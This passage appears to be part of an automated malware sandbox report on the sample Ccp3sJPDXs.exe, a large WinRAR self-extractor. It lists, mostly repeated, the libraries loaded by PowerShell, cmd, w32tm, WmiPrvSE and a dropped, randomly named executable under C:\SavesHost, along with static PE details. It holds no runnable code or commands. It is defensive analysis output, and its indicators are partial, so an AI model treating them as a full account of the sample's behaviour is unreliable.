                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: mscoree.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: apphelp.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: kernel.appcore.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: version.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: uxtheme.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: windows.storage.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: wldp.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: profapi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: cryptsp.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: rsaenh.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: cryptbase.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: sspicli.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: ktmw32.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: wbemcomn.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: amsi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: userenv.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: iphlpapi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: dnsapi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: winnsi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: rasapi32.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: rasman.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: rtutils.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: mswsock.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: winhttp.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: rasadhlp.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: fwpuclnt.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: winmm.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: winmmbase.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: mmdevapi.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: devobj.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: ksuser.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: avrt.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: audioses.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: powrprof.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: umpdc.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: msacm32.dll
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeSection loaded: midimap.dll
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: Ccp3sJPDXs.exeStatic file information: File size 16971446 > 1048576
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: Ccp3sJPDXs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Ccp3sJPDXs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Ccp3sJPDXs.exe
